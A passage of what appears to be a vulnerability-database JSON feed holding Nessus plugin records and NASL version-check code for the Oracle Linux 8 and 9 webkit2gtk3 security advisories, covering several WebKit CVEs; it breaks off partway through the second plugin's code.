Safari 15.4, watchOS 8.5, iTunes 12.12.3 for Windows, iOS 15.4 and iPadOS 15.4, tvOS 15.4.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-22629)\n\n - In WebKitGTK through 2.36.0 (and WPE WebKit), there is a heap-based buffer overflow in WebCore::TextureMapperLayer::setContentsLayer in WebCore/platform/graphics/texmap/TextureMapperLayer.cpp.\n (CVE-2022-30293)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.3, Safari 15.4, watchOS 8.5, iOS 15.4 and iPadOS 15.4, tvOS 15.4. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-22628)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in tvOS 15.5, watchOS 8.6, iOS 15.5 and iPadOS 15.5, macOS Monterey 12.4, Safari 15.5. Processing maliciously crafted web content may lead to code execution. (CVE-2022-26700)\n\n - A cookie management issue was addressed with improved state management. This issue is fixed in Security Update 2022-003 Catalina, macOS Big Sur 11.6.5. Processing maliciously crafted web content may disclose sensitive user information. (CVE-2022-22662)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.5 and iPadOS 15.5, macOS Monterey 12.4, tvOS 15.5, watchOS 8.6. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-26710)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.5, iOS 15.5 and iPadOS 15.5, watchOS 8.6, macOS Monterey 12.4, Safari 15.5. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-26709)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.3, iOS 15.4 and iPadOS 15.4, tvOS 15.4, Safari 15.4. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-22624)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-11-22T00:00:00", "type": "nessus", "title": "Oracle Linux 9 : webkit2gtk3 (ELSA-2022-8054)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-30293"], "modified": "2022-11-22T00:00:00", "cpe": ["cpe:/o:oracle:linux:9", "p-cpe:/a:oracle:linux:webkit2gtk3", "p-cpe:/a:oracle:linux:webkit2gtk3-devel", "p-cpe:/a:oracle:linux:webkit2gtk3-jsc", "p-cpe:/a:oracle:linux:webkit2gtk3-jsc-devel"], "id": "ORACLELINUX_ELSA-2022-8054.NASL", "href": "https://www.tenable.com/plugins/nessus/168097", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2022-8054.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(168097);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/11/22\");\n\n script_cve_id(\n \"CVE-2022-22624\",\n \"CVE-2022-22628\",\n \"CVE-2022-22629\",\n \"CVE-2022-22662\",\n \"CVE-2022-26700\",\n \"CVE-2022-26709\",\n \"CVE-2022-26710\",\n \"CVE-2022-26716\",\n \"CVE-2022-26717\",\n \"CVE-2022-26719\",\n \"CVE-2022-30293\"\n );\n\n script_name(english:\"Oracle Linux 9 : webkit2gtk3 (ELSA-2022-8054)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 9 host has packages installed that are affected by multiple vulnerabilities as referenced in the\nELSA-2022-8054 advisory.\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in tvOS 15.5,\n iOS 15.5 and iPadOS 15.5, watchOS 8.6, macOS Monterey 12.4, Safari 15.5. Processing maliciously crafted\n web content may lead to arbitrary code execution. (CVE-2022-26716, CVE-2022-26719)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.5,\n watchOS 8.6, iOS 15.5 and iPadOS 15.5, macOS Monterey 12.4, Safari 15.5, iTunes 12.12.4 for Windows.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-26717)\n\n - A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Monterey\n 12.3, Safari 15.4, watchOS 8.5, iTunes 12.12.3 for Windows, iOS 15.4 and iPadOS 15.4, tvOS 15.4.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-22629)\n\n - In WebKitGTK through 2.36.0 (and WPE WebKit), there is a heap-based buffer overflow in\n WebCore::TextureMapperLayer::setContentsLayer in WebCore/platform/graphics/texmap/TextureMapperLayer.cpp.\n (CVE-2022-30293)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS\n Monterey 12.3, Safari 15.4, watchOS 8.5, iOS 15.4 and iPadOS 15.4, tvOS 15.4. Processing maliciously\n crafted web content may lead to arbitrary code execution. (CVE-2022-22628)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in tvOS 15.5,\n watchOS 8.6, iOS 15.5 and iPadOS 15.5, macOS Monterey 12.4, Safari 15.5. Processing maliciously crafted\n web content may lead to code execution. (CVE-2022-26700)\n\n - A cookie management issue was addressed with improved state management. This issue is fixed in Security\n Update 2022-003 Catalina, macOS Big Sur 11.6.5. Processing maliciously crafted web content may disclose\n sensitive user information. (CVE-2022-22662)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.5 and\n iPadOS 15.5, macOS Monterey 12.4, tvOS 15.5, watchOS 8.6. Processing maliciously crafted web content may\n lead to arbitrary code execution. (CVE-2022-26710)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.5,\n iOS 15.5 and iPadOS 15.5, watchOS 8.6, macOS Monterey 12.4, Safari 15.5. Processing maliciously crafted\n web content may lead to arbitrary code execution. (CVE-2022-26709)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS\n Monterey 12.3, iOS 15.4 and iPadOS 15.4, tvOS 15.4, Safari 15.4. Processing maliciously crafted web\n content may lead to arbitrary code execution. (CVE-2022-22624)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2022-8054.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30293\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-26719\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/11/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/11/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkit2gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkit2gtk3-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkit2gtk3-jsc-devel\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_release = get_kb_item(\"Host/RedHat/release\");\nif (isnull(os_release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:os_release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^9([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 9', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\n\nvar pkgs = [\n {'reference':'webkit2gtk3-2.36.7-1.el9', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-2.36.7-1.el9', 'cpu':'i686', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-2.36.7-1.el9', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el9', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el9', 'cpu':'i686', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el9', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el9', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el9', 'cpu':'i686', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el9', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el9', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el9', 'cpu':'i686', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el9', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release) {\n if (exists_check) {\n if (rpm_exists(release:_release, rpm:exists_check) && rpm_check(release:_release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'webkit2gtk3 / webkit2gtk3-devel / webkit2gtk3-jsc / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:36:42", "description": "The remote Oracle Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the ELSA-2022-7704 advisory.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.3, Safari 15.4, watchOS 8.5, iOS 15.4 and iPadOS 15.4, tvOS 15.4. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-22628)\n\n - A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.3, Safari 15.4, watchOS 8.5, iTunes 12.12.3 for Windows, iOS 15.4 and iPadOS 15.4, tvOS 15.4.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-22629)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in tvOS 15.5, watchOS 8.6, iOS 15.5 and iPadOS 15.5, macOS Monterey 12.4, Safari 15.5. Processing maliciously crafted web content may lead to code execution. (CVE-2022-26700)\n\n - In WebKitGTK through 2.36.0 (and WPE WebKit), there is a heap-based buffer overflow in WebCore::TextureMapperLayer::setContentsLayer in WebCore/platform/graphics/texmap/TextureMapperLayer.cpp.\n (CVE-2022-30293)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.3, iOS 15.4 and iPadOS 15.4, tvOS 15.4, Safari 15.4. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-22624)\n\n - A cookie management issue was addressed with improved state management. This issue is fixed in Security Update 2022-003 Catalina, macOS Big Sur 11.6.5. Processing maliciously crafted web content may disclose sensitive user information. (CVE-2022-22662)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.5, iOS 15.5 and iPadOS 15.5, watchOS 8.6, macOS Monterey 12.4, Safari 15.5. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-26709)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.5 and iPadOS 15.5, macOS Monterey 12.4, tvOS 15.5, watchOS 8.6. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-26710)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in tvOS 15.5, iOS 15.5 and iPadOS 15.5, watchOS 8.6, macOS Monterey 12.4, Safari 15.5. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-26716, CVE-2022-26719)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.5, watchOS 8.6, iOS 15.5 and iPadOS 15.5, macOS Monterey 12.4, Safari 15.5, iTunes 12.12.4 for Windows.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-26717)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-11-15T00:00:00", "type": "nessus", "title": "Oracle Linux 8 : webkit2gtk3 (ELSA-2022-7704)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-30293"], "modified": "2022-11-15T00:00:00", "cpe": ["cpe:/o:oracle:linux:8", "p-cpe:/a:oracle:linux:glib2", "p-cpe:/a:oracle:linux:glib2-devel", "p-cpe:/a:oracle:linux:glib2-doc", "p-cpe:/a:oracle:linux:glib2-fam", "p-cpe:/a:oracle:linux:glib2-static", "p-cpe:/a:oracle:linux:glib2-tests", "p-cpe:/a:oracle:linux:webkit2gtk3", "p-cpe:/a:oracle:linux:webkit2gtk3-devel", "p-cpe:/a:oracle:linux:webkit2gtk3-jsc", "p-cpe:/a:oracle:linux:webkit2gtk3-jsc-devel"], "id": "ORACLELINUX_ELSA-2022-7704.NASL", "href": "https://www.tenable.com/plugins/nessus/167533", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2022-7704.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(167533);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/11/15\");\n\n script_cve_id(\n \"CVE-2022-22624\",\n \"CVE-2022-22628\",\n \"CVE-2022-22629\",\n \"CVE-2022-22662\",\n \"CVE-2022-26700\",\n \"CVE-2022-26709\",\n \"CVE-2022-26710\",\n \"CVE-2022-26716\",\n \"CVE-2022-26717\",\n \"CVE-2022-26719\",\n \"CVE-2022-30293\"\n );\n\n script_name(english:\"Oracle Linux 8 : webkit2gtk3 (ELSA-2022-7704)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the\nELSA-2022-7704 advisory.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS\n Monterey 12.3, Safari 15.4, watchOS 8.5, iOS 15.4 and iPadOS 15.4, tvOS 15.4. Processing maliciously\n crafted web content may lead to arbitrary code execution. (CVE-2022-22628)\n\n - A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Monterey\n 12.3, Safari 15.4, watchOS 8.5, iTunes 12.12.3 for Windows, iOS 15.4 and iPadOS 15.4, tvOS 15.4.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-22629)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in tvOS 15.5,\n watchOS 8.6, iOS 15.5 and iPadOS 15.5, macOS Monterey 12.4, Safari 15.5. Processing maliciously crafted\n web content may lead to code execution. (CVE-2022-26700)\n\n - In WebKitGTK through 2.36.0 (and WPE WebKit), there is a heap-based buffer overflow in\n WebCore::TextureMapperLayer::setContentsLayer in WebCore/platform/graphics/texmap/TextureMapperLayer.cpp.\n (CVE-2022-30293)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS\n Monterey 12.3, iOS 15.4 and iPadOS 15.4, tvOS 15.4, Safari 15.4. Processing maliciously crafted web\n content may lead to arbitrary code execution. (CVE-2022-22624)\n\n - A cookie management issue was addressed with improved state management. This issue is fixed in Security\n Update 2022-003 Catalina, macOS Big Sur 11.6.5. Processing maliciously crafted web content may disclose\n sensitive user information. (CVE-2022-22662)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.5,\n iOS 15.5 and iPadOS 15.5, watchOS 8.6, macOS Monterey 12.4, Safari 15.5. Processing maliciously crafted\n web content may lead to arbitrary code execution. (CVE-2022-26709)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.5 and\n iPadOS 15.5, macOS Monterey 12.4, tvOS 15.5, watchOS 8.6. Processing maliciously crafted web content may\n lead to arbitrary code execution. (CVE-2022-26710)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in tvOS 15.5,\n iOS 15.5 and iPadOS 15.5, watchOS 8.6, macOS Monterey 12.4, Safari 15.5. Processing maliciously crafted\n web content may lead to arbitrary code execution. (CVE-2022-26716, CVE-2022-26719)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.5,\n watchOS 8.6, iOS 15.5 and iPadOS 15.5, macOS Monterey 12.4, Safari 15.5, iTunes 12.12.4 for Windows.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-26717)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2022-7704.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30293\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-26719\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/11/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/11/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glib2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glib2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glib2-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glib2-fam\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glib2-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glib2-tests\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkit2gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkit2gtk3-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkit2gtk3-jsc-devel\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_release = get_kb_item(\"Host/RedHat/release\");\nif (isnull(os_release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:os_release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 8', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\n\nvar pkgs = [\n {'reference':'glib2-2.56.4-159.0.1.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'glib2-2.56.4-159.0.1.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'glib2-2.56.4-159.0.1.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'glib2-devel-2.56.4-159.0.1.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'glib2-devel-2.56.4-159.0.1.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'glib2-devel-2.56.4-159.0.1.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'glib2-doc-2.56.4-159.0.1.el8', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'glib2-fam-2.56.4-159.0.1.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'glib2-fam-2.56.4-159.0.1.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'glib2-static-2.56.4-159.0.1.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'glib2-static-2.56.4-159.0.1.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'glib2-static-2.56.4-159.0.1.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'glib2-tests-2.56.4-159.0.1.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'glib2-tests-2.56.4-159.0.1.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-2.36.7-1.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-2.36.7-1.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-2.36.7-1.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release) {\n if (exists_check) {\n if (rpm_exists(release:_release, rpm:exists_check) && rpm_check(release:_release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if 